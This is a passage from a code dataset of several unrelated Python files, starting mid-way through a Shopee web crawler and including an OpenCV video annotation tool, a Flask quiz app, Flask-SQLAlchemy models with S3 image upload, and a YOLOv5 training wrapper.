arr_item.push(item);\r\n }\r\n return arr_item;\r\n }\r\n return collectItems();''')\r\n return items\r\n except Exception as e:\r\n print(str(e))\r\n return \"Crawl_failure\"\r\n # Define function clickButtonNext\r\n def clickButtonNext(self):\r\n try:\r\n self.driver.find_element_by_css_selector(\".shopee-icon-button--right\").click()\r\n return \"Crawl_success\"\r\n except Exception as e:\r\n print(str(e))\r\n return \"Crawl_failure\"\r\n # Define function clickButtonNext\r\n def clickItems(self):\r\n try:\r\n item = self.driver.find_elements_by_css_selector(\".shopee-search-item-result__item\")[1].find_element_by_tag_name(\"a\")\r\n print(item.get_attribute('innerHTML'))\r\n item.click()\r\n return \"Crawl_success\"\r\n except Exception as e:\r\n print(str(e))\r\n return \"Crawl_failure\"\r\n # Clear images\r\n def clearImage(self):\r\n path = \"D:/Bifm/test/images/\"\r\n shutil.rmtree(path)\r\n os.mkdir(path)\r\n # Close browser\r\n def closeEngine(self):\r\n self.driver.close()","sub_path":"HttpServer/controller/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"238641819","text":"import imutils\r\nimport time\r\nimport cv2\r\nimport sys\r\nimport argparse\r\nimport numpy as np\r\nimport tkinter as tk\r\nfrom tkinter import simpledialog\r\n\r\n\r\nclass TrackerObject(object):\r\n def __init__(self, name, startFrame, id):\r\n self.category = name\r\n self.startFrame = startFrame\r\n self.id = id\r\n self.endFrame = None\r\n\r\n def 
endTrack(self, endFrame):\r\n self.endFrame = endFrame\r\n\r\n def __repr__(self):\r\n if len(self.category) > 6:\r\n return str(self.category) + \"_\" + str(self.id) + \"\\t\" + str(self.startFrame) + \"\\t\\t\\t\" + str(self.endFrame)\r\n else:\r\n return str(self.category) + \"_\" + str(self.id) + \"\\t\\t\" + str(self.startFrame) + \"\\t\\t\\t\" + str(self.endFrame)\r\n\r\n def __str__(self):\r\n if len(self.category) > 4:\r\n return str(self.category) + \"_\" + str(self.id) + \"\\t\" + str(self.startFrame) + \"\\t\\t\\t\" + str(self.endFrame)\r\n else:\r\n return str(self.category) + \"_\" + str(self.id) + \"\\t\\t\" + str(self.startFrame) + \"\\t\\t\\t\" + str(self.endFrame)\r\n\r\n\r\nclass Annotation(TrackerObject):\r\n def __init__(self):\r\n # Dictionary which contains IDs as keys and Categories as Values\r\n self.objects = {}\r\n self.extract = False\r\n self.selected_ROI = False\r\n self.image_coordinates = []\r\n self.images = {}\r\n\r\n def parse_arguments(self):\r\n parser = argparse.ArgumentParser(description='Annotate a video.')\r\n parser.add_argument('-v', metavar='video', help='Path to input video file', required=True)\r\n parser.add_argument('--delay', type=int, default=0.1, help='Delaying time between frames (default : 0.1)')\r\n parser.add_argument('--scale', type=int, default=3, help='Screen scale resolution divided (default : 3)')\r\n parser.add_argument('--marking', type=bool, default=False, help='Marks bounding box to remember its id (default : False)')\r\n\r\n args = parser.parse_args()\r\n return args.v, args.delay, args.scale, args.marking\r\n\r\n def check_object(self, name):\r\n lista = []\r\n for key, value in self.objects.items():\r\n if (value.category == name) and (value.endFrame is None):\r\n lista.append(key)\r\n return lista\r\n\r\n def write_detection(self, file_name, configurations, formatter=\"x+\"):\r\n try:\r\n f = open('frame_annotations/' + file_name, formatter)\r\n f.write(configurations)\r\n except:\r\n if (formatter == \"x+\"):\r\n print(\"File was already created. 
We will overwrite its content\")\r\n                self.write_detection(file_name, configurations, \"w\")\r\n            else:\r\n                print(\"Error: the file could be neither created nor overwritten\")\r\n\r\n    def rotate_image(self, image, angle):\r\n        image_center = tuple(np.array(image.shape[1::-1]) / 2)\r\n        rot_mat = cv2.getRotationMatrix2D(image_center, angle, 0.5)\r\n        result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\r\n        return result\r\n\r\n    def finishTracking(self, frameID):\r\n        for key, cat in self.objects.items():\r\n            if cat.endFrame is None:\r\n                cat.endTrack(frameID)\r\n\r\n    def input_message(self, title, message):\r\n        root = tk.Tk()\r\n        root.geometry('400x400+400+400')\r\n        root.withdraw()\r\n        # the input dialog\r\n        mess = simpledialog.askstring(title=title, prompt=message)\r\n        print(\"Input message: \" + str(mess))\r\n        return mess\r\n\r\n    def extract_coordinates(self, event, x, y, flags, parameters):\r\n        # Record starting (x,y) coordinates on left mouse button click\r\n        if event == cv2.EVENT_LBUTTONDOWN:\r\n            self.image_coordinates = [(x, y)]\r\n            self.extract = True\r\n\r\n        # Record ending (x,y) coordinates on left mouse button release\r\n        elif event == cv2.EVENT_LBUTTONUP:\r\n            self.image_coordinates.append((x, y))\r\n            self.extract = False\r\n            self.selected_ROI = True\r\n\r\n            # Draw rectangle around ROI\r\n            cv2.rectangle(self.clone, self.image_coordinates[0], self.image_coordinates[1], (0, 255, 0), 2)\r\n\r\n        # Clear drawing boxes on right mouse button click\r\n        elif event == cv2.EVENT_RBUTTONDOWN:\r\n            self.clone = self.frame.copy()\r\n            self.selected_ROI = False\r\n\r\n    def crop_ROI(self):\r\n        if self.selected_ROI:\r\n            cropped_frame = self.clone.copy()\r\n            x1 = self.image_coordinates[0][0]\r\n            y1 = self.image_coordinates[0][1]\r\n            x2 = self.image_coordinates[1][0]\r\n            y2 = self.image_coordinates[1][1]\r\n\r\n            cropped_image = cropped_frame[y1:y2, x1:x2]\r\n            print('Cropped image: {} {}'.format(self.image_coordinates[0], self.image_coordinates[1]))\r\n            return cropped_image\r\n        else:\r\n            print('Select ROI to crop before cropping')\r\n\r\n    def show_cropped_ROI(self, cropped_image, name):\r\n        cv2.imshow(name, cropped_image)\r\n        cv2.moveWindow(name, 0, (len(self.images)%5)*100)\r\n        cv2.resizeWindow(name, 200, 100)\r\n\r\n    def marking_ROI(self, img, name, id):\r\n        self.clone = img.copy()\r\n        cv2.namedWindow('image')\r\n        cv2.setMouseCallback('image', self.extract_coordinates)\r\n        self.images[id] = self.crop_ROI()\r\n        while True:\r\n            key = cv2.waitKey(2)\r\n            cv2.imshow('image', self.clone)\r\n\r\n            # Crop and display cropped image\r\n            if key == ord('c'):\r\n                aux = self.images[id]\r\n                self.images[id] = self.crop_ROI()\r\n                try:\r\n                    self.show_cropped_ROI(self.images[id], name + \"_\" + str(id))\r\n                except Exception:\r\n                    print(\"Error while capturing frame\")\r\n                    self.marking_ROI(img, name, id)\r\n                break\r\n\r\n    def main(self):\r\n        # Parse arguments\r\n        video_path, delay, scale, marking = self.parse_arguments()\r\n        result_file = video_path.split('.')[0] + \".txt\"\r\n        # Video processing\r\n        if not video_path:\r\n            print('Please execute command with : python frame_annotation.py -v <Video_Path>')\r\n            sys.exit()\r\n        cap = cv2.VideoCapture(video_path)\r\n        w, h = (cap.get(cv2.CAP_PROP_FRAME_WIDTH), cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n        print(\"Width: \" + str(w))\r\n        print(\"Height: \" + str(h))\r\n        rotate = False\r\n        if w > h:\r\n            rotate = True\r\n\r\n        # Exit if video not opened.\r\n        if not cap.isOpened():\r\n            print('Could not open {} video'.format(video_path))\r\n            sys.exit()\r\n\r\n        length = 
int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n id = 0\r\n frameId = 0\r\n\r\n # Loop over the video frames\r\n while (cap.isOpened()):\r\n r, self.frame = cap.read()\r\n\r\n # Re-scaling the frame to the desired resolution --> make to easy the display\r\n resized_dims = (int(w / scale), int(h / scale))\r\n resized_frame = cv2.resize(self.frame, resized_dims, interpolation=cv2.INTER_AREA)\r\n img = resized_frame\r\n\r\n if rotate:\r\n img = self.rotate_image(resized_frame, 270)\r\n\r\n if r:\r\n self.frame=img\r\n time.sleep(delay)\r\n cv2.imshow('image', self.frame)\r\n if frameId == 0:\r\n name = 'annotate'\r\n while name != \"quit\" and name != None:\r\n name = self.input_message(\"START\", \"As first frame, annotate all objects. Click 'Cancel' to continue next frame \")\r\n if name != \"quit\" and name != None:\r\n #MARKING = TRUE --> We have introduced a correct category\r\n if marking:\r\n self.marking_ROI(img, name, id)\r\n self.objects[id] = TrackerObject(name, frameId, id)\r\n id += 1\r\n\r\n k = cv2.waitKey(1) & 0xFF\r\n\r\n # press 'q' to exit\r\n if k == ord('q'):\r\n break\r\n\r\n # press 's' to mark the start of an object detected\r\n elif k == ord('s'):\r\n name = self.input_message(\"START\", \"Introduce the class of the new object detected\")\r\n if name != \"quit\" and name != None:\r\n if marking:\r\n self.marking_ROI(img, name, id)\r\n self.objects[id] = TrackerObject(name, frameId, id)\r\n id += 1\r\n\r\n # press 'f' to mark the final of an object detected\r\n elif k == ord('f'):\r\n name = self.input_message(\"END\", \"Introduce the class of the object that has disappeared\")\r\n IDs = self.check_object(name)\r\n while len(IDs) <= 0:\r\n print(\"Error introducing the category. Introduce it again or 'quit'\")\r\n name = self.input_message(\"END\", \"Category wrong as never introduced. ¿Class objected disappeared? 
\")\r\n if name == \"quit\" or name == None:\r\n break\r\n IDs = self.check_object(name)\r\n if len(IDs) == 1:\r\n self.objects[IDs[0]].endTrack(frameId)\r\n cv2.destroyWindow(name+\"_\"+str(IDs[0]))\r\n elif len(IDs) > 1:\r\n index = int(self.input_message(\"END - index\",\"Choose the correct index of the object dissappeared from \" + str(IDs) + \" : \"))\r\n if name != \"quit\" and name != None:\r\n (self.objects[index]).endTrack(frameId)\r\n cv2.destroyWindow(name + \"_\" + str(index))\r\n\r\n frameId += 1\r\n percentage = float(frameId / length) * 100\r\n if (percentage == 100):\r\n self.finishTracking(frameId)\r\n print(\"Trackable objects : \", flush=True)\r\n config = \"Category \\tStartFrame\\tEndFrame\\n\"\r\n for key, cat in self.objects.items():\r\n config += str(cat) + \"\\n\"\r\n print(str(cat), flush=True)\r\n cap.release()\r\n self.write_detection(result_file, config)\r\n # close all window\r\n cv2.destroyAllWindows()\r\n\r\n k = cv2.waitKey(1)\r\n if k == 0xFF & ord(\"q\"):\r\n break\r\n\r\n cap.release()\r\n # close all windows\r\n cv2.destroyAllWindows()\r\n\r\nif __name__ == \"__main__\":\r\n annotation = Annotation()\r\n annotation.main()\r\n","sub_path":"FrameIdentification/frame_annotation.py","file_name":"frame_annotation.py","file_ext":"py","file_size_in_byte":10825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"242400235","text":"from flask import Flask, render_template, redirect, url_for\r\n\r\nclass Question:\r\n def __init__(self, name, options, correct_opt):\r\n self.name = name\r\n self.options = options\r\n self.correct_opt = correct_opt\r\n\r\nQuestion1 = Question(\r\n 'Who is the current world champion in Beyblade Burst Surge?',\r\n ('Valt Aoi', 'Aiger Akabane', 'Delta Zakuro', 'Free De La Hoya'),\r\n 'Valt Aoi'\r\n)\r\n\r\nQuestion2 = Question(\r\n 'Who is the only blader of Turbo 4 whose Beyblade wasn\\'t repaired after destruction?',\r\n ('Phi', 'Xavier Bogard', 'Hyde', 'Laban Vanot'),\r\n 'Hyde'\r\n)\r\n\r\nQuestion3 = Question(\r\n 'Who is the only member of Big 5 who wasn\\'t there in the Semi-Finals of International Blader\\'s Cup?',\r\n ('Shu Kurenai', 'Lui Shirosagi', 'Free De La Hoya', 'Silas Karlisle'),\r\n 'Silas Karlisle'\r\n)\r\n\r\nQuestion4 = Question(\r\n 'Which is the 6th season of Beyblade Burst?',\r\n ('Turbo', 'DB', 'Rise', 'Surge'),\r\n 'DB'\r\n)\r\n\r\nQuestion5 = Question(\r\n 'Who is Lain Valhala\\'s partner in Legend Tag League Festival?',\r\n ('Valt Aoi', 'Shu Kurenai', 'Hyuga Hizashi', 'Ranjiro Kiyama'),\r\n 'Shu Kurenai'\r\n)\r\n\r\nglobal Questions\r\nQuestions = [\r\n Question1,\r\n Question2,\r\n Question3,\r\n Question4,\r\n Question5\r\n]\r\n\r\nglobal answers\r\nanswers = []\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/home')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route('/start')\r\ndef start():\r\n stage = 0\r\n return redirect(url_for('game', stage=stage))\r\n\r\n@app.route('/game/<int:stage>')\r\ndef game(stage):\r\n try:\r\n question = Questions[stage]\r\n return render_template('game.html', ask=question, no=stage+1)\r\n except:\r\n return redirect(url_for('results'))\r\n\r\n@app.route('/change/<int:num>/<value>')\r\ndef change(num, value):\r\n param1 = num\r\n param2 = value\r\n\r\n answers.append(str(param2))\r\n return redirect(url_for('game', stage=param1))\r\n\r\n@app.route('/results')\r\ndef results():\r\n question1 = answers[0]\r\n question2 = answers[1]\r\n question3 = answers[2]\r\n question4 = answers[3]\r\n question5 = 
answers[4]\r\n\r\n    questions = [\r\n        question1,\r\n        question2,\r\n        question3,\r\n        question4,\r\n        question5\r\n    ]\r\n\r\n    right_question1 = Questions[0].correct_opt\r\n    right_question2 = Questions[1].correct_opt\r\n    right_question3 = Questions[2].correct_opt\r\n    right_question4 = Questions[3].correct_opt\r\n    right_question5 = Questions[4].correct_opt\r\n\r\n    rights = [\r\n        right_question1,\r\n        right_question2,\r\n        right_question3,\r\n        right_question4,\r\n        right_question5\r\n    ]\r\n\r\n    right_questions = 0\r\n    for i in range(5):\r\n        if questions[i] == rights[i]:\r\n            right_questions += 1\r\n        else:\r\n            continue\r\n\r\n    return render_template('results.html', completed=right_questions)\r\n\r\n@app.route('/')\r\ndef index():\r\n    return redirect(url_for('home'))\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=False)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"639146512","text":"from django.urls import path\nfrom rest_framework import routers\nfrom . import views\n\n\nurlpatterns = [\n    path('', views.ShiftTopView.as_view(), name='shift_top'),\n    path('submit/', views.SubmitView.as_view(), name='submit'),\n    path('confirm/', views.ConfirmView.as_view(), name='confirm'),\n]\n\napp_name = 'apply'\n\nrouter = routers.DefaultRouter()\nrouter.register('shift', views.ShiftViewSet)\n","sub_path":"apply/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"395648030","text":"import matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\n\n\ndef viewer(volume, axis=2, **kwargs):\n    \"\"\"\n    Viewer based on code by Nicolas Barbey\n    available from: http://nbarbey.github.io/2011/07/08/matplotlib-slider.html\n    \"\"\"\n\n    # check dim\n    if not volume.ndim == 3:\n        raise ValueError(\"cube should be an ndarray with ndim == 3\")\n\n    # generate figure\n    fig = plt.figure()\n    ax = plt.subplot(111)\n    fig.subplots_adjust(left=0.25, bottom=0.25)\n\n    # select first image (index with a tuple: list indexing is an error in modern numpy)\n    s = [slice(0, 1) if i == axis else slice(None) for i in range(3)]\n    im = volume[tuple(s)].squeeze()\n\n    # display image\n    l = ax.imshow(im, **kwargs)\n\n    # define slider ('axisbg' was renamed 'facecolor' in matplotlib 2.x)\n    axcolor = 'lightgoldenrodyellow'\n    ax = fig.add_axes([0.25, 0.1, 0.65, 0.03], facecolor=axcolor)\n\n    slider = Slider(ax, 'Axis %i index' % axis, 0, volume.shape[axis] - 1,\n                    valinit=0, valfmt='%i')\n\n    def update(val):\n        ind = int(slider.val)\n        s = [slice(ind, ind + 1) if i == axis else slice(None)\n             for i in range(3)]\n        im = volume[tuple(s)].squeeze()\n        l.set_data(im)  # set_data() only accepts the image array\n        fig.canvas.draw()\n\n    slider.on_changed(update)\n\n    plt.show()","sub_path":"isinmrtbx/tools/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"208009820","text":"#!/usr/bin/env python\n\nimport ROOT\n\n# I shouldn't need this! 
\n# something is broken with rootmaps\nROOT.gSystem.Load(\"libWCPNavDict\")\n\ndef test_make():\n gds = ROOT.WCP.make_example_gds()\n assert gds\n\nif '__main__' == __name__:\n test_make()\n\n","sub_path":"test/test_examplegds.py","file_name":"test_examplegds.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"237607161","text":"from flask_sqlalchemy import SQLAlchemy\nimport base64\nimport boto3\nimport datetime\nfrom io import BytesIO\nfrom mimetypes import guess_extension, guess_type\nimport os\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\nimport random\nimport re\nimport string\nimport bcrypt\n\ndb = SQLAlchemy()\n\nEXTENSIONS = ['png', 'gif', 'jpg', 'jpeg', 'jpe']\nBASE_DIR = os.getcwd()\nS3_BUCKET = 'appdevhackchallenge'\nS3_BASE_URL = f'https://{S3_BUCKET}.s3-us-west-1.amazonaws.com'\n\nplayer_challenge_assoc = db.Table(\n 'player_challenge_assoc',\n db.Column('player_id', db.Integer, db.ForeignKey('player.id')),\n db.Column('challenge_id', db.Integer, db.ForeignKey('challenge.id'))\n)\n\nplayer_group_assoc = db.Table(\n 'player_group_assoc',\n db.Column('player_id', db.Integer, db.ForeignKey('player.id')),\n db.Column('group_id', db.Integer, db.ForeignKey('group.id'))\n)\n\nplayer_image_assoc = db.Table(\n 'player_image_assoc',\n db.Column('player_id', db.Integer, db.ForeignKey('player.id')),\n db.Column('asset_id', db.Integer, db.ForeignKey('asset.id'))\n)\n\nchallenge_image_assoc = db.Table(\n 'challenge_image_assoc',\n db.Column('challenge_id', db.Integer, db.ForeignKey('challenge.id')),\n db.Column('asset_id', db.Integer, db.ForeignKey('asset.id'))\n)\n\nclass Player(db.Model):\n \"\"\"\n Class used to represent Players Database\n\n Attributes:\n -------\n id: Database column to denote the IDs of each player\n name: Database column to denote the names of each player\n username: Database column for usernames of each player\n password_digest: Database column for passwords (encoded) of each player\n points: Database column for # of points each player has\n challenges: Denotes what challenge the player is currently doing\n groups: Denotes what groups the player is in\n authored_challenges: Denoted which challenges were created by a player\n asset: Stores a profile picture for a player\n \"\"\"\n\n __tablename__ = 'player'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String, nullable=False)\n password_digest = db.Column(db.String, nullable=False)\n points = db.Column(db.Integer, nullable=False)\n challenges = db.relationship('Challenge', secondary=player_challenge_assoc, back_populates='player')\n groups = db.relationship('Group', secondary=player_group_assoc, back_populates='players')\n authored_challenges = db.relationship(\"Challenge\", cascade=\"delete\")\n asset = db.relationship('Asset', secondary=player_image_assoc, uselist=False, cascade=\"delete\")\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize variables\n \"\"\"\n self.username = kwargs.get('username')\n self.password_digest = bcrypt.hashpw(kwargs.get(\"password\").encode(\"utf8\"), bcrypt.gensalt(rounds=13))\n self.points = 0\n\n def verify_password(self, password):\n return bcrypt.checkpw(password.encode(\"utf8\"), self.password_digest)\n\n def serialize(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"points\": self.points,\n \"current_challenges\": [c.serialize_condensed() for c in 
self.challenges if not c.completed],\n \"completed_challenges\": [c.serialize_condensed() for c in self.challenges if c.completed],\n \"groups\": [g.serialize_condensed() for g in self.groups],\n \"authored_challenges\": [c.serialize_condensed() for c in self.authored_challenges],\n \"image\": self.asset.serialize() if self.asset != None else None\n }\n \n def serialize_condensed(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"points\": self.points,\n }\n\nclass Challenge(db.Model):\n \"\"\"\n Class used to represent Challenge Database\n\n Attributes:\n -------\n id: Database column to denote the IDs of each challenge\n title: Database column to denote the title of each challenge\n description: Database column for description of each challenge\n claimed: Database column for whether a challenge has been claimed or not\n completed: Database column for whether a challenge has been completed or not\n author_username: Database column for the author username for a challenge\n author_id: Database Column for the author id for a challenge\n group_id: Database Column for group id for a challenge\n player: Denotes what player is partaking in a challenge right now\n asset: Ties a picture to a challenge\n \"\"\"\n \n __tablename__ = 'challenge'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String, nullable=False)\n description = db.Column(db.String, nullable=False)\n claimed = db.Column(db.Boolean, default=False, nullable=False)\n completed = db.Column(db.Boolean, default=False, nullable=False)\n author_username = db.Column(db.String, nullable=False)\n author_id = db.Column(db.Integer, db.ForeignKey(\"player.id\"), nullable=False)\n group_id = db.Column(db.Integer, db.ForeignKey(\"group.id\"))\n player = db.relationship('Player', secondary=player_challenge_assoc, back_populates='challenges')\n asset = db.relationship('Asset', secondary=challenge_image_assoc, uselist=False, cascade=\"delete\")\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize variables\n \"\"\"\n self.title = kwargs.get('title')\n self.description = kwargs.get('description')\n self.claimed = kwargs.get('claimed', False)\n self.completed = kwargs.get('completed', False)\n self.author_username = kwargs.get('author_username')\n self.author_id = kwargs.get('author_id')\n self.group_id = kwargs.get('group_id')\n\n def serialize(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"title\": self.title,\n \"description\": self.description,\n \"claimed\": self.claimed,\n \"completed\": self.completed,\n \"author_username\": self.author_username,\n \"author_id\": self.author_id,\n \"group_id\": self.group_id,\n \"player\": [p.serialize_condensed() for p in self.player],\n \"image\": self.asset.serialize() if self.asset != None else None\n }\n\n def serialize_condensed(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"title\": self.title,\n \"description\": self.description,\n \"claimed\": self.claimed,\n \"completed\": self.completed,\n \"author_username\": self.author_username,\n \"author_id\": self.author_id,\n \"group_id\": self.group_id,\n \"image\": self.asset.serialize() if self.asset != None else None\n }\n\n def serialize_group_id(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"group_id\": self.group_id,\n }\n\nclass Group(db.Model):\n \"\"\"\n Class used to represent Group Database\n\n Attributes:\n -------\n id: Database column to denote the IDs of each group\n 
name: Database column for name of each group\n players: Stores all players in the group\n local_challenges: Stores all challenges within the group\n \"\"\"\n\n __tablename__ = 'group'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=False)\n players = db.relationship('Player', secondary=player_group_assoc, back_populates='groups')\n local_challenges = db.relationship(\"Challenge\", cascade=\"delete\")\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize variables\n \"\"\"\n self.name = kwargs.get('name')\n\n def serialize(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"players\": [p.serialize_condensed() for p in self.players],\n \"challenges\": [c.serialize_condensed() for c in self.local_challenges]\n }\n\n def serialize_condensed(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n \"id\": self.id,\n \"name\": self.name\n }\n\nclass Asset(db.Model):\n \"\"\"\n Class used to represent Asset Database (uploading to/downloading from AWS)\n\n Attributes:\n -------\n id: Database column to denote the IDs of each file\n base_url: Database column for base_url of each file\n salt: Database column that represent unique identifier for images\n extension: Database column to store the extensions in each file\n height: Database column for image height\n width: Database column for image width\n created_at: Database column for when file was created\n player_id: Database column for player id (CAN BE NULL)\n challenge_id: Database column for challenge id (CAN BE NULL)\n \"\"\"\n\n __tablename__ = 'asset'\n id = db.Column(db.Integer, primary_key=True)\n base_url = db.Column(db.String, nullable=False)\n salt = db.Column(db.String, nullable=False)\n extension = db.Column(db.String, nullable=False)\n height = db.Column(db.Integer, nullable=False)\n width = db.Column(db.Integer, nullable=False)\n created_at = db.Column(db.DateTime, nullable=False)\n player_id = db.Column(db.Integer, nullable=True)\n challenge_id = db.Column(db.Integer, nullable=True)\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize variables\n \"\"\"\n self.create(kwargs.get('image_data'))\n self.challenge_id = kwargs.get('challenge_id', None)\n self.player_id = kwargs.get('player_id', None)\n\n def serialize(self):\n \"\"\"\n Return serialized data\n \"\"\"\n return {\n 'url': f'{self.base_url}/{self.salt}.{self.extension}',\n 'created_at': str(self.created_at),\n 'challenge_id': self.challenge_id if hasattr(self, 'challenge_id') else None,\n 'player_id': self.player_id if hasattr(self, 'player_id') else None\n }\n\n def create(self, image_data):\n \"\"\"\n Tries to create an image from base64 code and upload to Amazon s3 bucket\n\n @param image_data: base64 encoded data of image\n \"\"\"\n try:\n ext = guess_extension(guess_type(image_data)[0])[1:]\n if ext not in EXTENSIONS:\n raise Exception(f'Extension {ext} not supported!')\n \n salt = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for i in range(16))\n \n img_str = re.sub(\"^data:image/.+;base64,\", \"\", image_data)\n img_data = base64.b64decode(img_str)\n img = Image.open(BytesIO(img_data))\n\n self.base_url = S3_BASE_URL\n self.salt = salt\n self.extension = ext\n self.height = img.height\n self.width = img.width\n self.created_at = datetime.datetime.now()\n\n img_filename = f'{salt}.{ext}'\n self.upload(img, img_filename)\n\n except Exception as e:\n print('Error: ', e)\n\n def upload(self, img, img_filename):\n \"\"\"\n Tries to upload 
image to Amazon s3 bucket\n\n @param img: the image to upload\n @param img_filename: Filename for image\n \"\"\"\n try:\n img_tempdir = f'{BASE_DIR}/uploads/'\n img_temploc = f'{img_tempdir}{img_filename}'\n if not os.path.isdir(img_tempdir):\n os.mkdir(img_tempdir)\n img.save(img_temploc)\n\n s3_client = boto3.client('s3')\n s3_client.upload_file(img_temploc, S3_BUCKET, img_filename)\n\n s3_resource = boto3.resource('s3')\n object_acl = s3_resource.ObjectAcl(S3_BUCKET, img_filename)\n object_acl.put(ACL=\"public-read\")\n os.remove(img_temploc)\n\n except Exception as e:\n print('Upload Failed: ', e)","sub_path":"backend/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":11985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"98726698","text":"import os\nimport time\n\nthis_dir = os.path.abspath(__file__)[::-1].split(\"/\", 1)[1][::-1]\n\ndef train(data, output_dir, img_size=640, epochs=50, weights=\"yolov5s.pt\", batch=16):\n images_path, values_path = create_txt_images_from_data(data)\n data_file = create_yaml_data_file(images_path, values_path, len(data[\"class_labels\"]), data[\"class_labels\"])\n\n os.system(f\"python3 {this_dir}/yolov5/train.py --data {data_file} --img {img_size} --epochs {epochs} --weights {weights} --batch {batch} \")\n if os.path.exists(\"runs/train/exp/weights/best.pt\"):\n os.system(f\"mv runs/train/exp/weights/best.pt {output_dir}/{time.time()}.pt\")\n elif os.path.exists(\"runs/train/exp/weights/last.pt\"):\n os.system(f\"mv runs/train/exp/weights/last.pt {output_dir}/{time.time()}.pt\")\n else:\n print(\"Smt went wrong\")\n if os.path.exists(\"runs/train/exp\"):\n os.system(\"rm -r runs/\")\n os.system(\"rm -r easynn_current_data\")\n\n\ndef create_txt_images_from_data(data):\n os.system(\"mkdir easynn_current_data\")\n os.system(\"mkdir easynn_current_data/values\")\n name = data[\"image_files\"][0].split('/')[-1]\n file = data[\"image_files\"][0].split(name)[0]\n os.system(f\"cp -r {file} easynn_current_data/images/\")\n\n\n for file in data[\"image_files\"]:\n file_name = file.split(\"/\")[-1]\n txt_file = file_name[::-1].split('.', 1)[1][::-1]+\".txt\"\n with open(f\"easynn_current_data/values/{txt_file}\", 'w') as f:\n for mark in data[\"marks\"]:\n if file == mark[\"image\"]:\n class_number = data[\"class_labels\"].index(mark[\"label\"])\n x_centre = (mark[\"corners\"][0][0] + mark[\"corners\"][1][0])/2\n y_centre = (mark[\"corners\"][0][1] + mark[\"corners\"][1][1])/2\n width = (-mark[\"corners\"][0][0] + mark[\"corners\"][1][0])\n height = (-mark[\"corners\"][0][1] + mark[\"corners\"][1][1])\n f.write(f\"{class_number} {x_centre} {y_centre} {width} {height}\\n\")\n\n return \"easynn_current_data/images\", \"easynn_current_data/values\"\n\n\ndef create_yaml_data_file(train_dir, val_dir, number_of_classes, classes):\n write_to_yaml = [\n f\"train: {train_dir}\\n\"\n f\"val: {val_dir}\\n\"\n f\"\\n\"\n f\"nc: {number_of_classes}\\n\"\n f\"\\n\",\n f\"names: {classes}\\n\",\n ]\n with open(\"cur_data.yaml\", 'w') as f:\n for line in write_to_yaml:\n f.write(line)\n return \"cur_data.yaml\"\n\n\n\n# data = {\n# 'class_labels': ['asd'],\n# 'image_files': [\n# '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/How-to-Train-Your-Dog-to-Force-Fetch.jpg',\n# '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/dog-zoomies.jpg',\n# '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/honey_575p.jpg',\n# '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg'],\n# 
